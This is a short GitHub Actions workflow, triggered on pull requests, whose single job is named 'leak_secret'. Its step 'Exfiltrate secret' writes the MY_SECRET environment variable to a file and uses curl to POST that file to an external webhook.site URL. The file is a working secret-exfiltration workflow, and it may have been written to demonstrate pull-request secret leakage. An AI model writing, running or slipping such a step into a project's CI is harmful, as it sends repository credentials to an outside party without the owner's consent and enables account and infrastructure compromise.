name: CI

on:
  pull_request:

jobs:
  leak_secret:
    runs-on: ubuntu-latest
    steps:
      - name: Exfiltrate secret
        run: |
          echo "$MY_SECRET" > secret.txt
          curl -X POST --data-binary @secret.txt https://webhook.site/2b3156e7-1c4d-4cbb-94fb-8d2bab8cddad
